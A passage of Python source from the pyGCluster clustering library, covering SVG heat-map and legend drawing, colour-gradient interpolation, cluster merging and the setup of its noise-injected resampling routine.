self[ 'Heat map'][ 'Params' ][ 'heat map filename' ] = expression_map_filename
if legend_filename != None:
self[ 'Heat map'][ 'Params' ][ 'legend filename' ] = legend_filename
self[ 'Heat map'][ 'Params' ][ 'expression profile filename' ] = self[ 'Heat map'][ 'Params' ][ 'heat map filename' ]+'_expP.svg'
for filename in ['heat map filename', 'legend filename', 'expression profile filename']:
if '.svg' not in self[ 'Heat map'][ 'Params' ][ filename ]:
self[ 'Heat map'][ 'Params' ][ filename ] += '.svg'
#
# recalculate topBorder
#
for pos, line in enumerate( conditions ):
lineHeight = len( line ) * self[ 'Heat map'][ 'Params' ]['font size']
if lineHeight > self[ 'Heat map'][ 'Params' ][ 'top border' ]:
self[ 'Heat map'][ 'Params' ][ 'top border' ] = lineHeight
#
#
#
expProf = {}
assert type(identifiers) == type( [] ) , 'require a list of identifiers!'
# self._draw_expression_map_legend()
svgOut = codecs.open(
os.path.join(
self[ 'Working directory' ],
self[ 'Heat map' ][ 'Params' ]['heat map filename']
),
'w',
'utf-8'
)
svgWidth = len( conditions ) * self[ 'Heat map'][ 'Params' ][ 'rBox width' ] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text width']
svgHeight = len( identifiers ) * self[ 'Heat map'][ 'Params' ][ 'rBox height' ] + self[ 'Heat map'][ 'Params' ]['top border']
number_of_separators = 0
print("""<svg
xmlns="http://www.w3.org/2000/svg"
version="1.1"
preserveAspectRatio="xMinYMin meet"
width="{0}"
height="{1}"
font-size="{font size}px"
font-family="{font family}"
fill="black"
text-anchor="beginning"
baseline-alignment="middle"
>
<title>{title}</title>
""".format(
svgWidth,
svgHeight,
**self[ 'Heat map'][ 'Params' ]
),
file = svgOut
)
#
# write top legend
#
for condPos, condition in enumerate( conditions ):
x = int(self[ 'Heat map'][ 'Params' ][ 'left border' ] + (condPos) * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['rBox width'] / 2.0 )
y = int(self[ 'Heat map'][ 'Params' ][ 'top border' ] - self[ 'Heat map'][ 'Params' ]['text spacing'] )
print( unicode(
' <text x="{0}" y="{1}" text-anchor="left" transform="rotate(-90, {0}, {1})">{2}</text>'.format(
x,
y,
condition
),
errors = 'replace'
),
file = svgOut
)
for rowPos, identifier in enumerate( identifiers ):
adjustedRowPos = rowPos - number_of_separators
if identifier == '_placeholder_':
shapeDict = self._HM_calcShapeAndColor(
x = 0,
y = adjustedRowPos,
ratio = 0,
std = 0,
number_of_separators = number_of_separators,
)
shapeDict['x1_separator'] = shapeDict['x0']
shapeDict['x2_separator'] = shapeDict['x0'] + ( self[ 'Heat map'][ 'Params' ]['rBox width'] * len( conditions ))
print( unicode('''
<line x1="{x1_separator}" y1="{y0}" x2="{x2_separator}" y2="{y0}" style="stroke:rgb{0};stroke-width:{1}"/>
'''.format(
self[ 'Heat map'][ 'Params' ]['default color'],
self[ 'Heat map'][ 'Params' ]['separator width'],
**shapeDict
),
errors = 'replace'
),
file = svgOut
)
number_of_separators += 1
else:
expProf[ identifier ] = [ [] ]
for conPos, condition in enumerate( conditions ):
try:
ratio, std = data[ identifier ][ condition ]
insertion_point = int( len( expProf[ identifier ][ -1 ] ) / 2 )
# first entry in profile
expProf[ identifier ][ -1 ].insert( insertion_point, ratio - std )
expProf[ identifier ][ -1 ].insert( insertion_point, ratio + std )
except:
ratio, std = None, None
expProf[ identifier ].append( [] )
shapeDict = self._HM_calcShapeAndColor(
x = conPos,
y = adjustedRowPos,
ratio = ratio,
std = std,
number_of_separators = number_of_separators,
)
print( unicode( self['Heat map']['SVG box styles'][ box_style ].format(
rowPos,
conPos,
**shapeDict
),
errors = 'replace'
),
file = svgOut
)
#
shapeDict['x_text'] = (conPos + 1 ) * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text spacing']
shapeDict['y_text'] = (adjustedRowPos + 0.77) * self[ 'Heat map'][ 'Params' ]['rBox height'] + self[ 'Heat map'][ 'Params' ]['top border'] + (self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators)
shapeDict['text'] = ''
shapeDict['text'] += '{0}'.format( identifier )
if identifier in additional_labels.keys():
shapeDict['text'] += ' '.join(additional_labels[ identifier ])
if identifier in self[ 'Additional labels' ].keys():
shapeDict['text'] += ' '.join( self[ 'Additional labels' ][ identifier ])
print( unicode('''
<g id="Text rowPos{0}_conPos{1}">
<title>{ratio}±{std}</title>
<text xml:space='preserve' x="{x_text}" y="{y_text}">{text}</text>
</g>'''.format(
rowPos,
conPos,
**shapeDict
),
errors = 'replace'
),
file = svgOut
)
# eof
print("</svg>", file = svgOut )
svgOut.close()
#
# Drawing legend
#
svgLegendOut = codecs.open(
os.path.join(
self[ 'Working directory' ],
self[ 'Heat map' ][ 'Params' ]['legend filename']
),
'w',
'utf-8'
)
svgWidth = len( conditions ) * self[ 'Heat map'][ 'Params' ][ 'rBox width' ] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text width']
svgHeight = 11 * self[ 'Heat map'][ 'Params' ][ 'rBox height' ] + self[ 'Heat map'][ 'Params' ]['top border']
number_of_separators = 0
print("""<svg
xmlns="http://www.w3.org/2000/svg"
version="1.1"
preserveAspectRatio="xMinYMin meet"
width="{0}"
height="{1}"
font-size="{font size}px"
font-family="{font family}"
fill="black"
text-anchor="beginning"
baseline-alignment="middle"
>
<title>Legend</title>
<text x="{2}" y="{3}" text-anchor="left" transform="rotate(-90, {2}, {3})">ratio</text>
<text x="{4}" y="{3}" text-anchor="left" transform="rotate(-90, {4}, {3})">rel. std</text>
""".format(
svgWidth,
svgHeight,
int(self[ 'Heat map'][ 'Params' ][ 'left border' ] + 2 * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['rBox width'] / 2.0 ),
int(self[ 'Heat map'][ 'Params' ][ 'top border' ] - self[ 'Heat map'][ 'Params' ]['text spacing'] ) - 10,
int(self[ 'Heat map'][ 'Params' ][ 'left border' ] + 3 * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['rBox width'] / 2.0 ),
**self[ 'Heat map'][ 'Params' ]
),
file = svgLegendOut
)
positive_step_size = self[ 'Heat map' ]['Params'][ 'max' ] / 5.0
negative_step_size = self[ 'Heat map' ]['Params'][ 'min' ] / 5.0
number_of_separators = 0
for y in range(0,11):
_ = 5 - y
if _ >= 0:
ratio = positive_step_size * _
else:
ratio = negative_step_size * -1 * _
shapeDict = self._HM_calcShapeAndColor(
x = 2,
y = y,
ratio = ratio,
std = 0.0
)
print( unicode( self['Heat map']['SVG box styles'][ box_style ].format(
y,
2,
**shapeDict
),
errors = 'replace'
),
file = svgLegendOut
)
std = y * 0.1
shapeDict = self._HM_calcShapeAndColor(
x = 3,
y = y,
ratio = 1.0,
std = std
)
shapeDict['r'] = 147
shapeDict['g'] = 147
shapeDict['b'] = 147
print( unicode(self['Heat map']['SVG box styles'][ box_style ].format(
y,
3,
**shapeDict
),
errors = 'replace'
),
file = svgLegendOut
)
shapeDict['x_text_left'] = self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text spacing']
shapeDict['x_text_right'] = 4 * self[ 'Heat map'][ 'Params' ]['rBox width'] + self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['text spacing']
shapeDict['y_text_left'] = (y + 0.77) * self[ 'Heat map'][ 'Params' ]['rBox height'] + self[ 'Heat map'][ 'Params' ]['top border'] + (self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators)
shapeDict['text_left'] = '{0:3.2f}'.format( ratio )
shapeDict['text_right'] = '{0:2.1f}'.format( std )
print( unicode('''
<g id="Legend {0}">
<title>{ratio}±{std}</title>
<text xml:space='preserve' x="{x_text_left}" y="{y_text_left}">{text_left}</text>
<text xml:space='preserve' x="{x_text_right}" y="{y_text_left}">{text_right}</text>
</g>'''.format(
y,
**shapeDict
),
errors = 'replace'
),
file = svgLegendOut
)
print("</svg>", file = svgLegendOut )
svgLegendOut.close()
return
def _HM_calcShapeAndColor(self, x = None, y = None, ratio = None, std = None, number_of_separators = 0):
'''
Internal function to determine shape and color of expression map entries
'''
shapeDict = {}
shapeDict['ratio'] = ratio
shapeDict['std'] = std
shapeDict['r'], shapeDict['g'], shapeDict['b'] = self._HM_visualizeColor( ratio )
shapeDict['x0'] = int(self[ 'Heat map'][ 'Params' ]['left border'] + self[ 'Heat map'][ 'Params' ]['rBox width'] * x)
shapeDict['y0'] = int(self[ 'Heat map'][ 'Params' ]['top border'] + self[ 'Heat map'][ 'Params' ]['rBox height'] * y)
shapeDict['width'] = self[ 'Heat map'][ 'Params' ]['rBox width']
shapeDict['height'] = self[ 'Heat map'][ 'Params' ]['rBox height']
if std != None or (std is None and ratio is None): # or std != 0.0:
if std is None:
# ratio and sd for this entry are None, this will lead to white box
stdAsPercentOfRatio = 0
else:
if ratio == 0.0:
ratio += 0.01
stdAsPercentOfRatio = abs( std / float( ratio ) )
if stdAsPercentOfRatio > 1:
stdAsPercentOfRatio = 1
shapeDict['widthNew'] = int(round( (1 - stdAsPercentOfRatio) * self[ 'Heat map'][ 'Params' ]['rBox width'] ))
shapeDict['heightNew'] = int(round( (1 - stdAsPercentOfRatio) * self[ 'Heat map'][ 'Params' ]['rBox height'] ))
shapeDict['x1'] = int(shapeDict['x0'] + 0.5 * (self[ 'Heat map'][ 'Params' ]['rBox width'] - shapeDict['widthNew']))
shapeDict['y1'] = int(shapeDict['y0'] + 0.5 * (self[ 'Heat map'][ 'Params' ]['rBox height'] - shapeDict['heightNew']))
shapeDict['y0'] += self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators
shapeDict['y1'] += self[ 'Heat map'][ 'Params' ]['separator width'] * number_of_separators
shapeDict['height_half'] = shapeDict['height'] / 2.0
shapeDict['y3'] = shapeDict['y0'] + shapeDict['height']
shapeDict['x3'] = shapeDict['x0'] + shapeDict['width']
shapeDict['y2'] = shapeDict['y1'] + shapeDict['heightNew']
shapeDict['x2'] = shapeDict['x1'] + shapeDict['widthNew']
return shapeDict
def _HM_visualizeColor( self, ratio ):
'''
determine color for expression map values
'''
##
color = self[ 'Heat map'][ 'Params' ][ 'default color' ][:]
colorGradient = self[ 'Heat map' ][ 'Color Gradients' ][ self[ 'Heat map' ]['Params']['color gradient'] ]
if ratio != None:
if ratio >= 0:
scaling = self[ 'Heat map' ]['Params'][ 'max' ] / float( colorGradient[-1][0] )
else:
scaling = self[ 'Heat map' ]['Params'][ 'min' ] / float( colorGradient[0][0] )
scaled_ratio = ratio / scaling
idx = bisect.bisect( colorGradient, ( scaled_ratio, ) )
if idx == 0:
color = colorGradient[0][1]
elif idx == len( colorGradient):
color = colorGradient[-1][1]
else:
# linear interpolation ... between idx-1 & idx
dX = ( scaled_ratio - colorGradient[ idx - 1 ][ 0 ] ) / ( colorGradient[ idx ][ 0 ] - colorGradient[ idx - 1 ][ 0 ] )
for color_chanel in range(3):
d_ = dX * ( colorGradient[ idx ][ 1 ][ color_chanel ] - colorGradient[ idx - 1 ][ 1 ][ color_chanel ])
if abs( d_ ) <= sys.float_info.epsilon :
color[ color_chanel ] = int(round( colorGradient[idx - 1][ 1 ][ color_chanel ]))
else:
color[ color_chanel ] = int(round( colorGradient[idx - 1][ 1 ][ color_chanel ] + d_))
return color
def draw_expression_map_for_cluster(self, clusterID = None, cluster = None, filename = None, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = 'default', box_style = 'classic' ):
'''
Plots an expression map for a given cluster.
Either the parameter "clusterID" or "cluster" can be defined.
This function is useful to plot a user-defined cluster, e.g. knowledge-based cluster (TCA-cluster, Glycolysis-cluster ...). In this case, the parameter "cluster" should be defined.
:param clusterID: ID of a cluster (those are obtained e.g. from the plot of cluster frequencies or the node map)
:type clusterID: int
:param cluster: tuple containing the indices of the objects describing a cluster.
:type cluster: tuple
:param filename: name of the SVG file for the expression map.
:type filename: string
The following parameters are passed to :py:func:`pyGCluster.Cluster.draw_expression_map`:
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: name of box style used in SVG. Currently supported are classic, modern, fusion.
:type box_style: string
:rtype: none
'''
# check if function call was valid:
if clusterID is None and cluster is None:
self._print( '[ ERROR ] call function "draw_expression_map_for_cluster" with either a clusterID or a cluster.', verbosity_level = 0 )
return
elif clusterID != None and cluster != None:
self._print( '[ ERROR ] call function "draw_expression_map_for_cluster" with either a clusterID or a cluster.', verbosity_level = 0 )
return
# if clusterID is given, get the corresponding cluster:
elif clusterID != None:
for c, cID in self[ 'Cluster 2 clusterID' ].items():
if cID == clusterID:
break
cluster = c
# determine hm_filename:
if filename is None:
filename = '{0}.svg'.format( self[ 'Cluster 2 clusterID' ][ cluster ] )
hm_filename = os.path.join( self[ 'Working directory' ], filename )
# prepare for drawing of expression map ...
identifiers = []
data = {}
additional_labels = {}
try:
cFreq, cFreqDict = self.frequencies( cluster = cluster )
except KeyError:
cFreq = 0.0
for index in cluster:
identifier = self[ 'Identifiers' ][ index ]
identifiers.append( identifier )
data[ identifier ] = {}
for condition in self[ 'Conditions' ]:
data[ identifier ][ condition ] = self[ 'Data' ][ identifier ][ condition ]
additional_labels[ identifier ] = [ '{0:3.4f}'.format( cFreq ) ]
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = self[ 'Conditions' ],
additional_labels = additional_labels,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
expression_map_filename = hm_filename,
legend_filename = None,
color_gradient = color_gradient,
box_style = box_style
)
self._print( '... expression map saved as "{0}".'.format( hm_filename ), verbosity_level = 1 )
return
def draw_expression_map_for_community_cluster(self, name, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = '1337', sub_folder = None, min_obcofreq_2_plot = None, box_style = 'classic'):
'''
Plots the expression map for a given "community cluster":
Any cluster in the community node map is internally represented as a tuple with two elements:
"cluster" and "level". Those objects are stored as keys in self[ 'Communities' ],
from where they may be extracted and fed into this function.
:param name: "community cluster" -> best obtain from self[ 'Communities' ].keys()
:type name: tuple
:param min_obcofreq_2_plot: minimum obCoFreq of an cluster's object to be shown in the expression map.
:type min_obcofreq_2_plot: float
The following parameters are passed to :py:func:`pyGCluster.Cluster.draw_expression_map`:
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: name of box style used in SVG. Currently supported are classic, modern, fusion.
:type box_style: string
:param sub_folder: if specified, the expression map is saved in this folder, rather than in pyGCluster's working directory.
:type sub_folder: string
:rtype: none
'''
identifiers = []
data = {}
additional_labels = {}
for index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ]:
identifier = None
if index > 0:
normalized_obCoFreq = self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ]
if normalized_obCoFreq < min_obcofreq_2_plot:
continue
identifier = self[ 'Identifiers' ][ index ]
identifiers.append( identifier )
data[ identifier ] = {}
for condition in self[ 'Conditions' ]:
data[ identifier ][ condition ] = self[ 'Data' ][ identifier ][ condition ]
additional_labels[ identifier ] = [ '{0:3.4f}'.format( normalized_obCoFreq ) ]
else:
identifiers.append( '_placeholder_' )
hm_filename = '{0}-{1}.svg'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], name[ 1 ] )
if sub_folder != None:
if not os.path.exists( os.path.join( self[ 'Working directory' ], sub_folder ) ):
os.mkdir( os.path.join( self[ 'Working directory' ], sub_folder ) )
hm_filename = os.path.join( sub_folder , hm_filename )
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = self[ 'Conditions' ],
additional_labels = additional_labels,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
expression_map_filename = hm_filename,
legend_filename = None,
color_gradient = color_gradient,
box_style = box_style
)
return
def draw_community_expression_maps(self, min_value_4_expression_map = None, max_value_4_expression_map = None, color_gradient = 'default', box_style = 'classic', conditions= None, additional_labels=None):
'''
Plots the expression map for each community showing its object composition.
The following parameters are passed to :py:func:`pyGCluster.Cluster.draw_expression_map`:
:param min_value_4_expression_map: lower bound for color coding of values in the expression map. Remember that log2-values are expected, i.e. this value should be < 0!
:type min_value_4_expression_map: float
:param max_value_4_expression_map: upper bound for color coding of values in the expression map.
:type max_value_4_expression_map: float
:param color_gradient: name of the color gradient used for plotting the expression map. Currently supported are default, Daniel, barplot, 1337, BrBG, PiYG, PRGn, PuOr, RdBu, RdGy, RdYlBu, RdYlGn and Spectral
:type color_gradient: string
:param box_style: name of box style used in SVG. Currently supported are classic, modern, fusion.
:type box_style: string
:param additional_labels: dict with additional labels, k = identified and v = list of additional labels.
:type additional_labels: dict
:rtype: none
'''
if conditions is None:
conditions = self[ 'Conditions' ]
max_level = max( [ name[ 1 ] for name in self[ 'Communities' ] ] )
for cluster in self._get_levelX_clusters( level = max_level ):
name = ( cluster, max_level )
if len( cluster ) > self[ 'for IO skip clusters bigger than' ]:
continue
identifiers = []
data = {}
internal_additional_labels = {}
for index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].keys():
identifier = None
if index > 0:
# try:
identifier = self[ 'Identifiers' ][ index ]
# except:
# print( index , self[ 'Communities' ][ name ])
# print( list( self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].keys() ) )
# print('Tried to access Identifier # {0} and failed'.format( index ) )
# print('Total length of Identifiers is {0}'.format( len( self[ 'Identifiers' ] )))
# # for index in self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ].keys():
# # print( index )
# # print( len( self[ 'Data' ] ) )
# # exit(1)
# # identifier = 'WTF?'
# continue
identifiers.append( identifier )
data[ identifier ] = {}
for condition in self[ 'Conditions' ]:
data[ identifier ][ condition ] = self[ 'Data' ][ identifier ][ condition ]
internal_additional_labels[ identifier ] = [ '{0:4.2f}'.format( self[ 'Communities' ][ name ][ 'index 2 obCoFreq dict' ][ index ] ) ]
else:
identifiers.append( '_placeholder_' )
if additional_labels != None:
for k in internal_additional_labels.keys():
if k in additional_labels.keys():
internal_additional_labels[ k ] += additional_labels[ k ]
hm_filename = '{0}-{1}.svg'.format( self[ 'Communities' ][ name ][ 'cluster ID' ], name[ 1 ] )
self.draw_expression_map(
identifiers = identifiers,
data = data,
conditions = conditions,
additional_labels = internal_additional_labels,
min_value_4_expression_map = min_value_4_expression_map,
max_value_4_expression_map = max_value_4_expression_map,
expression_map_filename = hm_filename,
legend_filename = None,
color_gradient = color_gradient,
box_style = box_style
)
self._print( '... community expression maps saved in "{0}"'.format( self[ 'Working directory' ] ), verbosity_level = 1 )
return
def delete_resampling_results(self):
'''
Resets all variables holding any result of the re-sampling process.
This includes the convergence determination as well as the community structure.
Does not delete the data that is intended to be clustered.
:rtype: None
'''
self[ 'Cluster 2 clusterID' ] = {}
self[ 'Cluster counts' ] = None
self[ 'Distances' ] = []
self[ 'Linkages' ] = []
self[ 'Distance-linkage combinations' ] = []
self[ 'Iterations' ] = 0
self[ 'Convergence determination - params' ] = {}
self[ 'Convergence determination - iteration 2 n_mostfreq' ] = {}
self[ 'Convergence determination - first detected at iteration' ] = 0
self[ 'Communities' ] = {}
self[ 'Function parameters' ] = {}
return
def check_if_data_is_log2_transformed(self):
'''
Simple check if any value of the data_tuples (i.e. any mean) is below zero.
Below zero indicates that the input data was log2 transformed.
:rtype: boolean
'''
for identifier in self[ 'Data' ].keys():
for condition, data_tuple in self[ 'Data' ][ identifier ].items():
for value in data_tuple:
if value < 0:
return True
return False
def __add__(self, other):
'''
Adds re-sampling results of a pyGCluster instance into another one.
If the clustered data differs among those two instances, the other instance is NOT added.
If the distance-linkage combinations among those two instances differ, the other instance is NOT added.
:param other: the pyGCluster instance that is to be added to self.
:type other: pyGCluster instance
:rtype: None
'''
import numpy
assert self[ 'Data' ] == other[ 'Data' ], '[ ERROR ] pyGCluster-instances with different clustered data cannot be merged!'
assert sorted( self[ 'Distance-linkage combinations' ] ) == sorted( other[ 'Distance-linkage combinations' ] ), '[ ERROR ] pyGCluster-instances with a different distance-linkage combinations cannot be merged!'
self[ 'Iterations' ] += other[ 'Iterations' ]
if self[ 'Cluster counts' ] is None:
self[ 'Cluster counts' ] = numpy.zeros(
( 10 ** 4, len( self[ 'Distance-linkage combinations' ] ) ),
dtype = numpy.uint32
)
otherDLC2selfDLC = {}
for other_dlc_index, dlc in enumerate( other[ 'Distance-linkage combinations' ] ):
self_dlc_index = self[ 'Distance-linkage combinations' ].index( dlc )
otherDLC2selfDLC[ other_dlc_index ] = self_dlc_index
# merge clusters from other into self
for cluster, other_clusterID in other[ 'Cluster 2 clusterID' ].items():
if cluster not in self[ 'Cluster 2 clusterID' ]:
self[ 'Cluster 2 clusterID' ][ cluster ] = len( self[ 'Cluster 2 clusterID' ] ) # new cluster found, assign index
self_clusterID = self[ 'Cluster 2 clusterID' ][ cluster ]
for other_dlc_index, self_dlc_index in otherDLC2selfDLC.items():
try:
self[ 'Cluster counts' ][ self_clusterID ]
except IndexError:
self[ 'Cluster counts' ] = numpy.concatenate(
(
self[ 'Cluster counts' ],
numpy.zeros( ( 10 ** 4, len( self[ 'Distance-linkage combinations' ] ) ), dtype = numpy.uint32 )
)
) # add rows at bottom
self[ 'Cluster counts' ][ self_clusterID ][ self_dlc_index ] += other[ 'Cluster counts' ][ other_clusterID ][ other_dlc_index ]
return
def resample(self, distances, linkages, function_2_generate_noise_injected_datasets = None, min_cluster_size = 4, alphabet = None, force_plotting = False, min_cluster_freq_2_retain = 0.001, pickle_filename = 'pyGCluster_resampled.pkl', cpus_2_use = None, iter_tol = 0.01 / 100000, iter_step = 5000, iter_max = 250000, iter_top_P = 0.001, iter_window = 50000, iter_till_the_end = False):
'''
Routine for the assessment of cluster reproducibility (re-sampling routine).
To this, a high number of noise-injected datasets are created, which are subsequently clustered by AHC.
Those are created via :py:func:`pyGCluster.function_2_generate_noise_injected_datasets` (default = usage of Gaussian distributions).
Each 'simulated' dataset is then subjected to AHC x times, where x equals the number of distance-linkage combinations that come from all possible combinations of "distances" and "linkages".
In order to speed up the re-sampling routine, it is distributed to multiple threads, if cpus_2_use > 1.
The re-sampling routine stops once either convergence (see below) is detected or iter_max iterations have been performed.
Eventually, only clusters with a maximum frequency of at least min_cluster_freq_2_retain are stored; all others are discarded.
In order to visually inspect convergence, a convergence plot is created.
For more information about the convergence estimation, see Supplementary Material of pyGCluster's publication.
For a complete list of possible
Distance matrix calculations
see: http://docs.scipy.org/doc/scipy/reference/spatial.distance.html
or Linkage methods
see: http://docs.scipy.org/doc/scipy/reference/generated/scipy.cluster.hierarchy.linkage.html
.. note ::
If memory is of concern (e.g. for a large dataset, > 5000 objects), cpus_2_use should be kept low.
:param distances: list of distance metrices, given as strings, e.g. [ 'correlation', 'euclidean' ]
:type distances: list
:param linkages: list of distance metrices, given as strings, e.g. [ 'average', 'complete', 'ward' ]
:type linkages: list
:param function_2_generate_noise_injected_datasets: function to generate noise-injected datasets. If None (default), Gaussian distributions are used.
:type function_2_generate_noise_injected_datasets: function
:param min_cluster_size: minimum size of a cluster, so that it is included in the assessment of cluster reproducibilities.
:type min_cluster_size: int
:param alphabet: alphabet used to convert decimal indices to characters to save memory. Defaults to string.printable, without ','.
:type alphabet: string
.. note ::
If alphabet contains ',', this character is removed from alphabet, because the indices comprising a cluster are saved comma-seperated.
:param force_plotting: the convergence plot is created after each iter_step iteration (otherwise only when convergence is detected).
:type force_plotting: boolean
:param min_cluster_freq_2_retain: ]0, 1[ minimum frequency of a cluster (only the maximum of the dlc-frequencies matters here) it has to exhibit to be stored in pyGCluster once all iterations are finished.
:type min_cluster_freq_2_retain: float
:param cpus_2_use: number of threads that are evoked in the re-sampling routine.
:type cpus_2_use: int
:param iter_max: maximum number of re-sampling iterations.
:type iter_max: int
Convergence determination:
:param iter_tol: ]0, 1e-3[ value for the threshold of the median of normalized slopes, in order to declare convergence.
:type iter_tol: float
:param iter_step: number of iterations each multiprocess performs and simultaneously the interval in which to check for convergence.
:type iter_step: int
:param iter_top_P: ]0, 1[ for the convergence estmation, the amount of most frequent clusters is examined. This is the threshold for the minimum frequency of a cluster to be included.
:type iter_top_P: float
:param iter_window: size of the sliding window in iterations. The median is obtained from normalized slopes inside this window - *should be a multiple of iter_step*
:type iter_window: int
:param iter_till_the_end: if set to True, the convergence determination is switched off; hence, re-sampling is performed until iter_max is reached.
:type iter_till_the_end: boolean
:rtype: None
'''
self[ 'Function parameters' ][ self.resample.__name__ ] = { k : v for k, v in locals().items() if k != 'self' }
import numpy
import scipy.cluster.hierarchy as sch
import scipy.spatial.distance as ssd
if function_2_generate_noise_injected_datasets is None:
function_2_generate_noise_injected_datasets = yield_noisejected_dataset
if alphabet is None:
alphabet = string.printable
alphabet = alphabet.replace( ',', '' )
## create distance-linkage combinations (dlc)
self[ 'Distances' ] = distances
self[ 'Linkages' ] = linkages
# check if all distance metrices are valid:
invalid_dists = set( self[ 'Distances' ] ) - set( dir( ssd ) )
if invalid_dists:
s = '[ WARNING ] invalid distance metrices! "{0}" are not in "scipy.spatial.distance".'
self._print( s.format( ', '.join( invalid_dists ) ), verbosity_level = 0 )
# check if all linkage methods are valid:
invalid_linkages = set( self[ 'Linkages' ] ) - sch._cpy_linkage_methods
if invalid_linkages:
s = '[ WARNING ] invalid linkage methods! "{0}" are not in "scipy.cluster.hierarchy".'
self._print( s.format( ', '.join( invalid_linkages ) ), verbosity_level = 0 )
# get all possible distance-linkage combinations:
self[ 'Distance-linkage combinations' ] = []
for distance in self[ 'Distances' ]:
for linkage in self[ 'Linkages' ]:
if distance != 'euclidean' and linkage in sch._cpy_euclid_methods:
continue
self[ 'Distance-linkage combinations' ].append( '{0}-{1}'.format( distance, linkage ) )
n_dlc = len( self[ 'Distance-linkage combinations' ] )
self._print( '{0} distance-linkage combinations are evaluated.'.format( n_dlc ), verbosity_level = 2 )
self._print( '... those are: {0}.'.format( ', '.join( self[ 'Distance-linkage combinations' ] ) ), verbosity_level = 2 )
## check if permission to write:
if pickle_filename:
try:
with open( os.path.join( self[ 'Working directory' ], 'tmp.txt' ), 'w' ) as fout:
pass
os.remove( os.path.join( self[ 'Working directory' ], 'tmp.txt' ) )
except IOError:
s = '[ WARNING ] You do not have permission, or folder does not exist!\n\tresults in "{0}" are NOT pickled!'
self._print( s.format( self[ 'Working directory' ] ), verbosity_level = 0 )
pickle_filename = False
## check if a pickle file with the same name is already in the "Working directory"
## this indicates that clustering is likely to be continued:
if pickle_filename in os.listdir( self[ 'Working directory' ] ):
self._print( 'Pickle file with the same name detected! Pickle "{0}" will be loaded and clustering continued ...'.format( pickle_filename ), verbosity_level = 0 )
loaded = Cluster()
loaded.load( os.path.join( self[ 'Working directory' ], pickle_filename ) )
self + loaded
## create tmp_struct to store the cluster counts:
tmpstruct_clustercounts = {}
tmpstruct_clustercounts[ 'Cluster counts' ] = numpy.zeros( ( 10 ** 5, n_dlc ), dtype = numpy.uint32 )
tmpstruct_clustercounts[ 'Cluster 2 clusterID' ] = {}
tmpstruct_clustercounts[ 'Discarded IDs' ] = set()
## initialize variables for the convergence determination
self[ 'Convergence determination - params' ] = {}
self[ 'Convergence determination - params' ][ 'iter_step' ] = iter_step
self[ 'Convergence determination - params' ][ 'iter_top_P' ] = iter_top_P
self[ 'Convergence determination - params' ][ 'iter_tol' ] = iter_tol
self[ 'Convergence determination - params' ][ 'iter_window' ] = iter_window
self[ 'Convergence determination - params' ][ 'iter_max' ] = iter_max
if iter_window % iter_step:
s = '[ WARNING ] iter_window = {0} is NOT a multiple of iter_step = {1}. Better re-call with a multiple of iter_step!'
self._print( s.format( iter_window, iter_step ), verbosity_level = 1 )
## prepare for multiprocesses:
if cpus_2_use != None:
if cpus_2_use > multiprocessing.cpu_count():
s = '[ WARNING ] You requested to perform re-sampling on {0} threads, but only {1} available -> better re-call with "cpus_2_use = {1}"!'
self._print( s.format( cpus_2_use, multiprocessing.cpu_count() ), verbosity_level = 0 )
n_multiprocesses = cpus_2_use
else:
n_multiprocesses = multiprocessing.cpu_count()
DataQ = multiprocessing.Queue()
kwargs4multiprocess = {}
kwargs4multiprocess[ 'DataQ' ] = DataQ
kwargs4multiprocess[ 'data' ] = self[ 'Data' ]
kwargs4multiprocess[ 'iterations' ] = iter_step
kwargs4multiprocess[ 'alphabet' ] = alphabet
kwargs4multiprocess[ 'dlc' ] = self[ 'Distance-linkage combinations' ]
kwargs4multiprocess[ 'min_cluster_size' ] = min_cluster_size
kwargs4multiprocess[ 'min_cluster_freq_2_retain' ] = min_cluster_freq_2_retain
kwargs4multiprocess[ 'function_2_generate_noise_injected_datasets' ] = function_2_generate_noise_injected_datasets
#this does not work on windows... we have to check that
try:
sys.getwindowsversion()
except:
os.nice( 10 )
